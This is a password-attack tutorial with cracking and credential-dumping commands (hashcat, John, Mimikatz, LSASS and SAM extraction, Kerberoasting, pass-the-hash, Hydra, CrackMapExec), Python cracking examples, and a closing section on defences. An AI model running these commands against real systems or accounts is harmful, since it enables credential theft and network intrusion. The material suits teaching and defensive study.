Password Attack Fundamentals
Password attacks are one of the most common and effective methods used by attackers to gain unauthorized access to systems. Understanding these techniques is critical for both offensive security testing and defensive implementation.
Attack Methodology Overview
Password attacks follow a systematic approach:
- Reconnaissance: Gather information about target users, password policies, and authentication mechanisms
- Hash Acquisition: Obtain password hashes through various techniques (SAM dumping, LSASS extraction, network sniffing)
- Attack Selection: Choose appropriate attack method based on hash type, available resources, and time constraints
- Cracking: Execute the attack using appropriate tools and wordlists
- Verification: Test cracked credentials against target systems
Password Storage Fundamentals
Understanding how passwords are stored is crucial for attack success:
| Storage Method | Security Level | Attack Approach |
|---|---|---|
| Plaintext | Critical Risk | Direct access - no cracking needed |
| Encoding (Base64, Hex) | Critical Risk | Trivial decoding - not encryption |
| Weak Hashing (MD5, SHA1) | High Risk | Rainbow tables, fast cracking |
| Unsalted Fast Hashing (NTLM, raw SHA-256) | High Risk | Dictionary and mask attacks at billions of guesses per second; with no salt, one guess is tested against every hash at once |
| Salted Fast Hashing (SHA-256 + per-user salt) | Medium Risk | Salt defeats rainbow tables and cross-account reuse, but each guess is still cheap |
| Adaptive Hashing (bcrypt, Argon2) | Lower Risk | Slow, resource-intensive cracking |
Common Hash Types
Recognizing hash types is the first step in any password cracking operation. Length and prefix are the usual clues; 32 hex characters is ambiguous between MD5 and NTLM, so check where the hash came from:
5d41402abc4b2a76b9719d911017c592 (MD5, 32 hex characters; this one is md5("hello"))
aaf4c61ddcc5e8a2dab... (SHA-1, 40 hex characters; truncated here)
209c6174da490caeb422f3fa5a7ae634 (NTLM, 32 hex characters; MD4 of the UTF-16LE password, here "admin")
$2b$10$N9qo8uLO... (bcrypt; $2b$ is the variant, 10 the cost factor, the rest is salt and digest; truncated here)
Password Attack Techniques
1. Dictionary Attacks
Dictionary attacks use pre-compiled wordlists containing common passwords, words, and phrases. This is typically the first attack method due to its effectiveness against weak passwords.
Common Wordlists
- rockyou.txt: 14+ million real-world passwords (145MB) - the gold standard
- SecLists: Comprehensive collection organized by category
- CrackStation: 15GB wordlist with 1.5 billion entries
- Custom wordlists: Built from target reconnaissance (company names, industry terms, locations)
Dictionary Attack Example
# John the Ripper - Basic dictionary attack
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# Hashcat - Dictionary attack against NTLM hashes
hashcat -m 1000 -a 0 ntlm_hashes.txt rockyou.txt
# Show cracked passwords
john --show hashes.txt
2. Brute Force Attacks
Brute force attacks systematically try every possible character combination. While guaranteed to succeed given enough time, they're computationally expensive and time-consuming.
Character Set Definitions
| Hashcat Mask | Character Set | Description |
|---|---|---|
| ?l | abcdefghijklmnopqrstuvwxyz | Lowercase letters (26) |
| ?u | ABCDEFGHIJKLMNOPQRSTUVWXYZ | Uppercase letters (26) |
| ?d | 0123456789 | Digits (10) |
| ?s | space plus !"#$%&'()*+,-./:;<=>?@[\]^_`{\|}~ | Special characters (33) |
| ?a | ?l?u?d?s combined | All printable ASCII (95) |
| ?b | 0x00 - 0xff | All byte values (256) |
Brute Force Examples
# Hashcat - 8-character brute force over all printable ASCII (95^8, about 6.6 x 10^15 candidates;
# at 100 GH/s against NTLM that is roughly 18 hours, and every additional ?a multiplies it by 95)
hashcat -m 1000 -a 3 hashes.txt ?a?a?a?a?a?a?a?a
# Common pattern: Uppercase + lowercase + digits (Password123)
hashcat -m 1000 -a 3 hashes.txt ?u?l?l?l?l?l?l?l?d?d?d
# Incremental attack (John) - starts short, increases length
john --incremental hashes.txt
# Mask attack targeting common pattern: Capital + 6 lowercase + 2 digits
hashcat -m 1000 -a 3 hashes.txt ?u?l?l?l?l?l?l?d?d
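The masks above are only useful once you can size them. The following is an added example (not code from the original page or from hashcat) that computes the keyspace of a hashcat-style mask, including custom charsets, and turns it into a worst-case runtime. The 100 GH/s NTLM figure in the demo is an assumed, illustrative rate, not a benchmark; substitute the output of hashcat -b for your own hardware.

```python
"""Keyspace and crack-time estimate for hashcat masks (added example, not from the page).

Mirrors hashcat's -a 3 semantics: each ?x token is one position, a bare character is a
literal position, ?? is a literal question mark, and custom charsets (-1 .. -4) may be
built from the built-ins. The hash rate used in the demo is an assumption.
"""
import string

# Built-in hashcat charsets; ?s is space plus the 32 ASCII punctuation characters
BUILTIN = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " " + string.punctuation,
    "a": string.ascii_letters + string.digits + " " + string.punctuation,
    "b": "".join(chr(i) for i in range(256)),
}


def expand_charset(spec, custom=None):
    """Expand a charset spec such as '?l?u?d' or 'abc?d' into its distinct characters.
    `custom` maps '1'..'4' to already-expanded strings (hashcat's -1 .. -4)."""
    custom = custom or {}
    out = []
    i = 0
    while i < len(spec):
        if spec[i] == "?":
            if i + 1 >= len(spec):
                raise ValueError("dangling '?' in %r" % spec)
            key = spec[i + 1]
            if key == "?":
                out.append("?")
            elif key in BUILTIN:
                out.append(BUILTIN[key])
            elif key in custom:
                out.append(custom[key])
            else:
                raise ValueError("unknown charset ?%s" % key)
            i += 2
        else:
            out.append(spec[i])
            i += 1
    return "".join(dict.fromkeys("".join(out)))   # dedupe, keep first-seen order


def mask_positions(mask, custom=None):
    """Split a mask into per-position charsets: 'pass?d' -> ['p', 'a', 's', 's', '0123456789']."""
    custom = {k: expand_charset(v) for k, v in (custom or {}).items()}
    positions = []
    i = 0
    while i < len(mask):
        if mask[i] == "?":
            positions.append(expand_charset(mask[i:i + 2], custom))
            i += 2
        else:
            positions.append(mask[i])
            i += 1
    return positions


def mask_keyspace(mask, custom=None):
    """Number of candidates hashcat -a 3 generates for the mask (product of the position sizes)."""
    total = 1
    for charset in mask_positions(mask, custom):
        total *= len(charset)
    return total


def crack_time_seconds(keyspace, hashes_per_second):
    """Worst case: time to exhaust the keyspace. Expected time to hit one random target is half this."""
    return keyspace / hashes_per_second


def human_time(seconds):
    for name, size in (("years", 365 * 86400), ("days", 86400), ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return "%.1f %s" % (seconds / size, name)
    return "%.3f seconds" % seconds


if __name__ == "__main__":
    NTLM_RATE = 100e9   # assumed ~100 GH/s NTLM for one modern GPU; replace with your hashcat -b figure
    for mask, custom in (("?a?a?a?a?a?a?a?a", None),
                         ("?u?l?l?l?l?l?l?d?d", None),
                         ("?1?1?1?1?1?1?1?1", {"1": "?l?u?d"})):
        ks = mask_keyspace(mask, custom)
        print("%-22s %24s candidates  worst case %s"
              % (mask, format(ks, ","), human_time(crack_time_seconds(ks, NTLM_RATE))))
```

The contrast the demo prints is the practical lesson: the full 8-character ?a mask takes hours at this rate, while the "Capital + 6 lowercase + 2 digits" pattern from the page is exhausted in seconds, which is why mask attacks target human patterns rather than the whole keyspace.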
3. Hybrid Attacks
Hybrid attacks combine dictionary words with rule-based modifications, dramatically increasing effectiveness while maintaining reasonable speed.
Common Hybrid Patterns
- Dictionary word + numbers: password123, summer2024
- Dictionary word + special chars: password!, welcome@123
- Leetspeak substitutions: p@ssw0rd, h4ck3r
- Capitalization variants: Password, PASSWORD
# Hashcat - Hybrid wordlist + mask (append numbers)
hashcat -m 1000 -a 6 hashes.txt rockyou.txt ?d?d?d?d
# Hashcat - Hybrid mask + wordlist (prepend uppercase)
hashcat -m 1000 -a 7 hashes.txt ?u?u rockyou.txt
# John - Apply rules to wordlist
john --wordlist=rockyou.txt --rules=best64 hashes.txt
4. Rainbow Table Attacks
Rainbow tables are precomputed hash databases that trade disk space for computation time. They work only against unsalted hashes.
Rainbow Table Limitations
- Salting defeats rainbow tables: Each unique salt requires a completely new table
- Storage requirements: Comprehensive tables require terabytes of storage
- Hash algorithm specific: Separate tables needed for MD5, SHA-1, NTLM, etc.
# RainbowCrack - Generate rainbow tables
rtgen md5 loweralpha 1 8 0 3800 33554432 0
# RainbowCrack - Crack with rainbow tables
rcrack /path/to/tables -h 5f4dcc3b5aa765d61d8327deb882cf99
# Ophcrack (Windows) - GUI-based rainbow table tool
# Particularly effective against Windows LM/NTLM hashes
5. Rule-Based Attacks
Rule-based attacks apply transformation rules to wordlist entries, creating intelligent mutations based on common password patterns.
John the Ripper Rule Syntax
# Sample John rules (john.conf)
[List.Rules:Custom]
# Capitalize first letter
c
# Toggle case of all characters
t
# Append 2024 (each $ command appends one character)
$2 $0 $2 $4
# Prepend and append !
^! $!
# Leetspeak conversion
sa@ se3 si1 so0 ss$
Hashcat Rule Examples
# Hashcat - Use built-in best64 rules
hashcat -m 1000 -a 0 hashes.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# Common hashcat rule functions:
# c - Capitalize first letter
# u - Uppercase all
# l - Lowercase all
# $X - Append character X
# ^X - Prepend character X
# sXY - Replace X with Y
# Custom rule file example (custom.rule). hashcat only treats a line that starts with # as a
# comment; a trailing comment would be parsed as rule functions, so keep comments on their own lines:
# Capitalize + append 123
c $1 $2 $3
# Capitalize + append !@
c $! $@
# Lowercase + append 2024
l $2 $0 $2 $4
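To make the rule syntax from the hybrid and rule-based sections concrete, here is an added example (my own code, not hashcat's or John's) that implements the handful of functions listed above, loads a rule file, and runs a rule-based dictionary attack against unsalted MD5 hashes. The wordlist, the rule file and the target hashes are constructed for the demo (the targets are produced by hashing the answers, so the run is self-checking); anything the engine does not support raises instead of silently passing the word through.

```python
"""A small hashcat/John-style rule engine and a rule-based dictionary attack (added example).

Supports : l u c C t r d [ ] $X ^X sXY. Spaces between functions are ignored, as hashcat
does, and lines starting with # are comments. The wordlist, rules and target hashes are
constructed for the demo.
"""
import hashlib

# function letter -> number of argument characters it consumes
ARGC = {":": 0, "l": 0, "u": 0, "c": 0, "C": 0, "t": 0, "r": 0, "d": 0,
        "[": 0, "]": 0, "$": 1, "^": 1, "s": 2}


def parse_rule(rule):
    """'c $1 $2' -> [('c', ''), ('$', '1'), ('$', '2')]."""
    ops, i = [], 0
    while i < len(rule):
        fn = rule[i]
        if fn == " ":
            i += 1
            continue
        if fn not in ARGC:
            raise ValueError("unsupported rule function %r in %r" % (fn, rule))
        args = rule[i + 1:i + 1 + ARGC[fn]]
        if len(args) != ARGC[fn]:
            raise ValueError("missing argument for %r in %r" % (fn, rule))
        ops.append((fn, args))
        i += 1 + ARGC[fn]
    return ops


def apply_rule(rule, word):
    """Apply one rule line to one word, function by function, left to right."""
    w = word
    for fn, a in parse_rule(rule):
        if fn == "l":
            w = w.lower()
        elif fn == "u":
            w = w.upper()
        elif fn == "c":
            w = w[:1].upper() + w[1:].lower()   # capitalize first, lower the rest
        elif fn == "C":
            w = w[:1].lower() + w[1:].upper()
        elif fn == "t":
            w = w.swapcase()
        elif fn == "r":
            w = w[::-1]
        elif fn == "d":
            w = w + w
        elif fn == "[":
            w = w[1:]
        elif fn == "]":
            w = w[:-1]
        elif fn == "$":
            w = w + a
        elif fn == "^":
            w = a + w
        elif fn == "s":
            w = w.replace(a[0], a[1])
        # ':' is the no-op that keeps the unmodified word as a candidate
    return w


def load_rules(text):
    """Parse the contents of a rule file: skip blank lines and # comments."""
    return [ln.strip() for ln in text.splitlines() if ln.strip() and not ln.lstrip().startswith("#")]


def candidates(words, rules):
    """Yield every (word, rule, mutated) triple: the full candidate set of a -a 0 -r run."""
    for rule in rules:
        for word in words:
            yield word, rule, apply_rule(rule, word)


def crack_md5(targets, words, rules):
    """Rule-based dictionary attack on unsalted MD5; returns {hash: plaintext} for the hits."""
    found, pending = {}, set(targets)
    for _word, _rule, guess in candidates(words, rules):
        h = hashlib.md5(guess.encode()).hexdigest()
        if h in pending:
            found[h] = guess
            pending.discard(h)
            if not pending:
                break
    return found


RULES_TEXT = """\
# constructed custom.rule for the demo
:
c $1 $2 $3
c $! $@
l $2 $0 $2 $4
sa@ se3 si1 so0 ss$
^! $!
"""
WORDS = ["password", "admin", "welcome", "summer"]   # constructed mini-wordlist
# Targets are constructed by hashing the answers, so the demo checks itself
TARGETS = [hashlib.md5(p.encode()).hexdigest() for p in ("Password123", "p@$$w0rd", "!admin!", "summer2024")]


def demo():
    return crack_md5(TARGETS, WORDS, load_rules(RULES_TEXT))


if __name__ == "__main__":
    for h, plain in demo().items():
        print(h, plain)
```

Four base words and six rules produce 24 candidates and recover all four targets; that multiplication of a small wordlist by cheap transformations is the whole point of rule-based attacks, and also why appending a year or swapping a for @ adds almost nothing to password strength.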
Windows Authentication Deep Dive
Windows Authentication Protocols
1. NTLM (NT LAN Manager)
NTLM is a challenge-response authentication protocol still widely used in Windows environments, despite being considered legacy. Two different things get called an "NTLM hash": the NT hash stored in the SAM or NTDS.dit (MD4 of the UTF-16LE password, with no salt) and the NetNTLMv1/v2 challenge-response captured on the wire, which is computed from that NT hash.
| Aspect | NT hash (stored) | NetNTLMv1 (on the wire) | NetNTLMv2 (on the wire) |
|---|---|---|---|
| Construction | MD4 of UTF-16LE password (16 bytes) | DES-based response to an 8-byte server challenge | HMAC-MD5 over server and client challenges, keyed with HMAC-MD5(NT hash, UPPER(user) + domain) |
| Primary abuse | Pass-the-hash; offline cracking | Crack to recover the NT hash (small DES keyspace); relay | Relay to other services; offline cracking of captured responses |
| Crackability | Very high (unsalted, fast MD4) | High | Medium (HMAC-MD5 is fast, but user and domain names vary per capture) |
| Salting | None | Challenge prevents replay but adds no cracking cost | Challenges prevent replay but add no cracking cost |
| hashcat mode | 1000 | 5500 | 5600 |
NTLM Hash Format
# NT hash example (32 hex characters, MD4 of the UTF-16LE password; this one is the NT hash of "admin")
209c6174da490caeb422f3fa5a7ae634
# Combined LM:NTLM format (from SAM)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
# Format breakdown:
# Username : RID : LM Hash : NTLM Hash : Comment : Home Dir : (empty fields)
2. Kerberos Authentication
Kerberos is the default authentication protocol in modern Active Directory environments, using tickets instead of password hashes.
- User requests TGT (Ticket Granting Ticket) from KDC
- KDC validates credentials and issues encrypted TGT
- User presents TGT to request service tickets
- Service validates ticket and grants access
Kerberos Attack Vectors
- Kerberoasting: Request service tickets for SPNs, crack offline
- AS-REP Roasting: Extract crackable hashes from accounts without Kerberos pre-auth
- Golden Ticket: Forge TGTs using compromised KRBTGT hash
- Silver Ticket: Forge service tickets using service account hashes
# Kerberoasting with impacket
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request
# AS-REP Roasting (accounts with pre-auth disabled). Without domain credentials GetNPUsers.py cannot
# query LDAP, so give it a list of candidate users; with credentials, -request enumerates the accounts itself
GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat -no-pass
GetNPUsers.py domain.local/user:password -dc-ip 10.10.10.10 -request -format hashcat
# Crack Kerberos tickets with hashcat
hashcat -m 13100 krb5tgs.txt rockyou.txt # TGS-REP
hashcat -m 18200 asrep.txt rockyou.txt # AS-REP
SAM Database (Security Account Manager)
The SAM database stores local user account information and password hashes on Windows systems.
SAM File Locations
- Active SAM: C:\Windows\System32\config\SAM (locked while the OS is running)
- Backup: C:\Windows\System32\config\RegBack\SAM (no longer populated by default since Windows 10 1803; the files there are usually 0 bytes)
- Volume Shadow Copy: previous versions accessible via VSS
SAM Extraction Techniques
# Method 1: Registry hives extraction (requires admin)
reg save HKLM\SAM C:\temp\sam.hive
reg save HKLM\SYSTEM C:\temp\system.hive
# Method 2: Volume Shadow Copy (vssadmin create shadow exists only on server editions; on clients use
# diskshadow or wmic shadowcopy call create Volume=C:\). Copy SYSTEM as well: it holds the boot key
# that encrypts the SAM hashes, so SAM alone cannot be decrypted
vssadmin list shadows
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\
# Method 3: Offline extraction (boot from external OS)
# Mount drive and copy SAM/SYSTEM files
# Extract hashes using samdump2 (Linux)
samdump2 system.hive sam.hive
# Extract hashes using impacket (secretsdump.py)
secretsdump.py -sam sam.hive -system system.hive LOCAL
LSASS Memory Dumping
The Local Security Authority Subsystem Service (LSASS) process holds the credentials of logged-on users in memory. Dumping it can reveal NT hashes and Kerberos tickets, and plaintext passwords on systems where WDigest still caches them.
LSASS Dumping Methods
# Method 1: Task Manager (GUI - leaves obvious traces)
# Right-click lsass.exe → Create dump file
# Method 2: ProcDump (signed Sysinternals binary, but "procdump -ma lsass" is a well-known EDR signature)
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Method 3: comsvcs.dll MiniDump export (native Windows). It takes the PID, not the process name,
# and must run from an elevated shell that holds SeDebugPrivilege
tasklist /fi "imagename eq lsass.exe"
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <lsass PID> C:\temp\lsass.dmp full
# Method 4: PowerShell - Out-Minidump is from PowerSploit, not a built-in cmdlet (requires admin)
Get-Process lsass | Out-Minidump -DumpFilePath C:\temp\
# All of these are blocked by LSA Protection (RunAsPPL) and yield no secrets when Credential Guard is enabled
# Parse dump with Mimikatz (offline)
mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
Mimikatz - The Credential Extraction King
Mimikatz is the most powerful credential dumping tool for Windows environments, capable of extracting plaintext passwords, hashes, PINs, and Kerberos tickets.
Essential Mimikatz Commands
# Obtain SeDebugPrivilege (needed to open LSASS), then impersonate a SYSTEM token
privilege::debug
token::elevate
# Dump all credentials from LSASS memory
sekurlsa::logonpasswords
# Dump specific credential types
sekurlsa::wdigest # Plaintext passwords (Windows 7/2008 R2 and earlier, or where UseLogonCredential=1)
sekurlsa::msv # NTLM hashes
sekurlsa::kerberos # Kerberos tickets
sekurlsa::tspkg # Terminal Services credentials
# Extract SAM database hashes
lsadump::sam
# Extract Domain Cached Credentials
lsadump::cache
# LSA Secrets (service account passwords, auto-logon)
lsadump::secrets
# DCSync attack (requires Domain Admin or equivalent)
lsadump::dcsync /domain:corp.local /user:Administrator
# Pass-the-Hash attack
sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:HASH /run:cmd.exe
# Golden Ticket creation
kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:HASH /id:500
# Extract all Kerberos tickets
sekurlsa::tickets /export
Domain Cached Credentials (DCC)
Windows caches domain credentials locally to allow logon when domain controllers are unavailable. These cached credentials can be extracted and cracked.
# Extract cached credentials with Mimikatz
mimikatz # lsadump::cache
# DCC2 format (modern Windows)
# Requires 10,240 iterations of PBKDF2-HMAC-SHA1
# Significantly slower to crack than NTLM
# Crack with hashcat (mode 2100)
hashcat -m 2100 cached_creds.txt rockyou.txt
Password Cracking Tool Reference
John the Ripper
John the Ripper is a versatile, open-source password cracker that supports numerous hash types and attack modes.
Basic Usage
# Basic dictionary attack
john --wordlist=rockyou.txt hashes.txt
# With rules applied
john --wordlist=rockyou.txt --rules=best64 hashes.txt
# Incremental mode (brute force)
john --incremental hashes.txt
# Show cracked passwords
john --show hashes.txt
# Specify format explicitly
john --format=NT --wordlist=rockyou.txt ntlm_hashes.txt
# Resume interrupted session
john --restore
# Check available formats
john --list=formats
# Single crack mode (username-based mangling)
john --single hashes.txt
Hash Format Examples
# Unix/Linux passwords (from /etc/shadow)
root:$6$rounds=5000$salt$hash:18532:0:99999:7:::
# Windows NTLM (from SAM)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:NTLM_HASH:::
# MD5 hash
username:5d41402abc4b2a76b9719d911017c592
# SHA-512 (Linux)
$6$rounds=5000$saltsaltsal$hash_value_here
Hashcat
Hashcat is the world's fastest password cracker, supporting GPU acceleration and 300+ hash algorithms.
Common Hash Types (-m flag)
| Mode | Hash Type | Description |
|---|---|---|
| 0 | MD5 | Unsalted MD5 hash |
| 100 | SHA1 | Unsalted SHA1 hash |
| 1000 | NTLM | Windows NTLM hash |
| 1800 | sha512crypt | Linux $6$ hash |
| 3200 | bcrypt | bcrypt $2*$ hash |
| 5600 | NetNTLMv2 | Network NTLM v2 |
| 13100 | Kerberos 5 TGS-REP | Kerberoasting |
| 18200 | Kerberos 5 AS-REP | AS-REP Roasting |
Attack Modes (-a flag)
# -a 0: Straight dictionary attack
hashcat -m 1000 -a 0 hashes.txt rockyou.txt
# -a 1: Combination attack (combine two wordlists)
hashcat -m 1000 -a 1 hashes.txt wordlist1.txt wordlist2.txt
# -a 3: Brute force / mask attack
hashcat -m 1000 -a 3 hashes.txt ?a?a?a?a?a?a?a?a
# -a 6: Hybrid wordlist + mask
hashcat -m 1000 -a 6 hashes.txt rockyou.txt ?d?d?d?d
# -a 7: Hybrid mask + wordlist
hashcat -m 1000 -a 7 hashes.txt ?u?u rockyou.txt
Advanced Hashcat Techniques
# Use rules file
hashcat -m 1000 -a 0 hashes.txt rockyou.txt -r best64.rule
# Session management
hashcat -m 1000 -a 0 hashes.txt rockyou.txt --session=mysession
hashcat --session=mysession --restore
# Performance tuning
hashcat -m 1000 -a 0 hashes.txt rockyou.txt -w 3 # Workload profile (1-4)
hashcat -m 1000 -a 0 hashes.txt rockyou.txt -O # Optimized kernels
# Show results
hashcat -m 1000 hashes.txt --show
# Benchmark mode (test performance)
hashcat -b -m 1000
# Custom charset: -1 defines ?1 as lowercase + uppercase + digits, then 8 positions of ?1 (62^8 candidates).
# To walk lengths 1..8 instead of a fixed 8, add --increment (hashcat's equivalent of John's incremental mode)
hashcat -m 1000 -a 3 hashes.txt -1 ?l?u?d ?1?1?1?1?1?1?1?1
# Output to file
hashcat -m 1000 -a 0 hashes.txt rockyou.txt -o cracked.txt
Hydra - Online Password Attacks
THC Hydra is a parallelized network login cracker supporting numerous protocols.
# SSH brute force
hydra -l admin -P passwords.txt ssh://192.168.1.100
# FTP with username list
hydra -L users.txt -P passwords.txt ftp://192.168.1.100
# HTTP POST form attack
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form "/login:username=^USER^&password=^PASS^:Invalid"
# RDP attack
hydra -l administrator -P passwords.txt rdp://192.168.1.100
# SMB/Windows shares
hydra -l admin -P passwords.txt smb://192.168.1.100
# Common flags:
# -l username : Single username
# -L userlist : Username list file
# -p password : Single password
# -P passlist : Password list file
# -t threads : Parallel connections (default: 16)
# -v : Verbose output
# -f : Exit after first valid login found
CrackMapExec (CME)
Swiss army knife for pentesting Windows/Active Directory networks.
# Password spray across subnet
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Password123' --continue-on-success
# Pass-the-hash attack
crackmapexec smb 192.168.1.0/24 -u Administrator -H 'NTLM_HASH'
# Dump SAM hashes
crackmapexec smb 192.168.1.100 -u admin -p password --sam
# Dump LSA secrets
crackmapexec smb 192.168.1.100 -u admin -p password --lsa
# Execute command
crackmapexec smb 192.168.1.100 -u admin -p password -x whoami
# Enumerate shares
crackmapexec smb 192.168.1.0/24 -u guest -p '' --shares
Medusa
Fast, parallel, modular login brute-forcer.
# SSH attack
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh
# Multiple hosts from file
medusa -H hosts.txt -u admin -P passwords.txt -M ssh
# HTTP authentication
medusa -h 192.168.1.100 -u admin -P passwords.txt -M http -m DIR:/admin
# Available modules
medusa -d
Which tool for which job:
- Offline cracking: Hashcat (GPU) or John (CPU)
- Online attacks: Hydra or Medusa
- Windows/AD: CrackMapExec or Mimikatz
- Wordlist generation: Crunch or CeWL
Hands-On Hash Cracking Lab
Put your knowledge into practice: crack these sample hashes using the techniques you've learned. All three are unsalted MD5 (hashcat -m 0, John --format=raw-md5) of passwords that appear in common wordlists, so a straight dictionary attack with rockyou.txt is enough.
5f4dcc3b5aa765d61d8327deb882cf99
e99a18c428cb38d5f260853678922e03
25d55ad283aa400af464c76d713c07ad
Password Defense Strategies
Password Policy Best Practices
Effective password policies balance security with usability:
| Policy Element | Recommendation | Rationale |
|---|---|---|
| Minimum Length | 12-16 characters | Length is more important than complexity |
| Complexity | Encourage passphrases | 4 random words > complex 8-char password |
| Expiration | Not required if strong | Forced changes lead to predictable patterns |
| History | Remember last 12-24 | Prevent password reuse |
| Lockout Threshold | 5-10 failed attempts | Balance security vs. DoS risk |
| Lockout Duration | 15-30 minutes | Slow down brute force attacks |
Multi-Factor Authentication (MFA)
MFA dramatically reduces the effectiveness of password attacks by requiring additional verification factors:
MFA Factor Types
- Something you know: Password, PIN
- Something you have: Phone, hardware token, smart card
- Something you are: Biometrics (fingerprint, face, iris)
- Somewhere you are: GPS location, network location
Common Second Factors
- SMS and voice codes: vulnerable to interception and SIM swapping
- Authenticator apps: TOTP-based; immune to SIM swapping but still phishable, since a relay (adversary-in-the-middle) page can forward the code within its validity window
- Hardware security keys: FIDO2/WebAuthn, phishing-resistant because the signature is bound to the site origin
- Push notifications: convenient but susceptible to MFA fatigue (repeated prompts until the user approves); number matching reduces this
Secure Password Storage
How passwords are stored determines their vulnerability to compromise:
Storage Method Comparison
import base64, hashlib, bcrypt, argon2
# NEVER - Plaintext storage
password = "MyPassword123"
# NEVER - Simple encoding (not encryption): reversible by anyone who reads the database
password = base64.b64encode(b"MyPassword123")
# NEVER - Weak hashing without salt: rainbow tables and billions of guesses per second
password = hashlib.md5(b"MyPassword123").hexdigest()
# WEAK - Fast hashing, even with a per-user salt: no rainbow tables, but each guess is still nearly free
password = hashlib.sha256(salt + b"MyPassword123").hexdigest()
# GOOD - Slow adaptive hashing (bcrypt; cost 12 means 2^12 rounds, raise it as hardware gets faster)
password = bcrypt.hashpw(b"MyPassword123", bcrypt.gensalt(rounds=12))
# BEST - Modern memory-hard hashing (argon2-cffi's PasswordHasher defaults to Argon2id)
password = argon2.PasswordHasher().hash("MyPassword123")
Why Adaptive Hashing?
Adaptive algorithms take a tunable cost parameter (bcrypt rounds, PBKDF2 iterations, Argon2 time and memory cost), so the work per guess can be raised as hardware improves without changing the scheme. Argon2id and scrypt are also memory-hard, which blunts the GPU and ASIC advantage that makes MD5, SHA-2 and NTLM cracking so fast: the attacker has to pay the same cost per guess that the server pays per login, and the server only pays it once.
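The following added example (my own code, not from the page; standard library only) makes the cost argument measurable: it stores one password under a fast salted SHA-256 scheme, under PBKDF2-HMAC-SHA256 and under scrypt, then runs the same dictionary attack against each record and reports guesses per second. The record format is a constructed "scheme$params$salt$digest" string, not a standard one, and the work factors in the demo are deliberately low so it finishes quickly; production settings belong in the tens of thousands of PBKDF2 iterations at least (OWASP currently recommends 600,000 for SHA-256) and a much larger scrypt or Argon2id memory cost. scrypt stands in for bcrypt/Argon2 because it ships with hashlib.

```python
"""Why a fast salted hash is weak and an adaptive hash is not (added example, stdlib only).

Three constructed storage formats with verification, then the same dictionary attack
against each so the cost per guess can be compared. Demo work factors are deliberately
low; production should use far higher ones.
"""
import hashlib
import hmac
import os
import time


def hash_password(password, scheme, salt=None, work=None):
    """Return a self-describing record: scheme$params$salt$digest (constructed format, not a standard)."""
    salt = salt or os.urandom(16)
    pw = password.encode()
    if scheme == "sha256":                       # WEAK: salted but fast
        digest = hashlib.sha256(salt + pw).hexdigest()
        params = "0"
    elif scheme == "pbkdf2_sha256":              # GOOD: tunable iteration count
        work = work or 600_000
        digest = hashlib.pbkdf2_hmac("sha256", pw, salt, work).hex()
        params = str(work)
    elif scheme == "scrypt":                     # BEST tier: memory-hard (n=2**14 with r=8 uses 16 MiB)
        work = work or 2 ** 14
        digest = hashlib.scrypt(pw, salt=salt, n=work, r=8, p=1, dklen=32).hex()
        params = str(work)
    else:
        raise ValueError("unknown scheme %r" % scheme)
    return "%s$%s$%s$%s" % (scheme, params, salt.hex(), digest)


def verify_password(record, password):
    """Recompute with the stored salt and parameters; compare in constant time."""
    scheme, params, salt_hex, digest = record.split("$")
    expected = hash_password(password, scheme, bytes.fromhex(salt_hex), int(params) or None)
    return hmac.compare_digest(expected.split("$")[3], digest)


def dictionary_attack(record, wordlist):
    """What an attacker holding the database does: one verify() per candidate. Returns (hit, guesses/second)."""
    start = time.perf_counter()
    hit, tried = None, 0
    for word in wordlist:
        tried += 1
        if verify_password(record, word):
            hit = word
            break
    elapsed = time.perf_counter() - start
    return hit, (tried / elapsed) if elapsed > 0 else float("inf")


WORDLIST = ["123456", "password", "qwerty", "letmein", "Welcome1", "dragon",
            "monkey", "Summer2023", "Summer2024!", "trustno1"]   # constructed mini-wordlist


def demo():
    """Hash one password under each scheme and attack each record with the same wordlist."""
    results = {}
    for scheme, work in (("sha256", None), ("pbkdf2_sha256", 100_000), ("scrypt", 2 ** 14)):
        if scheme == "scrypt" and not hasattr(hashlib, "scrypt"):
            continue   # older OpenSSL builds lack scrypt
        record = hash_password("Summer2024!", scheme, work=work)
        results[scheme] = dictionary_attack(record, WORDLIST)
    return results


if __name__ == "__main__":
    for scheme, (hit, rate) in demo().items():
        print("%-14s cracked=%-12s %12.0f guesses/s" % (scheme, hit, rate))
```

All three schemes are "salted" and all three give up the password to a nine-word list; the only thing that changes between them is the guess rate, which drops by several orders of magnitude from the SHA-256 record to the PBKDF2 and scrypt records. Scale that to a billion-entry wordlist on GPU hardware and the difference is minutes versus years.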
Account Lockout and Rate Limiting
Defensive mechanisms to slow down or prevent brute force attacks:
# Windows Group Policy - Account Lockout
Computer Configuration → Windows Settings → Security Settings → Account Policies → Account Lockout Policy
Account lockout threshold: 5 invalid attempts
Account lockout duration: 30 minutes
Reset account lockout counter after: 30 minutes
# Linux PAM (/etc/pam.d/common-auth). pam_tally2 is the legacy module and was removed in Linux-PAM 1.5;
# current distributions use pam_faillock, which needs a preauth line before pam_unix and an authfail line after it
auth required pam_tally2.so deny=5 unlock_time=1800 onerr=fail
auth required pam_faillock.so preauth silent deny=5 unlock_time=1800
auth [success=1 default=ignore] pam_unix.so nullok
auth [default=die] pam_faillock.so authfail deny=5 unlock_time=1800
account required pam_faillock.so
# Web Application - Progressive delay. Keep the attempt counter server-side, keyed per account and source
# address; blocking a worker in sleep() also lets an attacker tie up connections, so many applications
# reject with a Retry-After instead of sleeping
import time

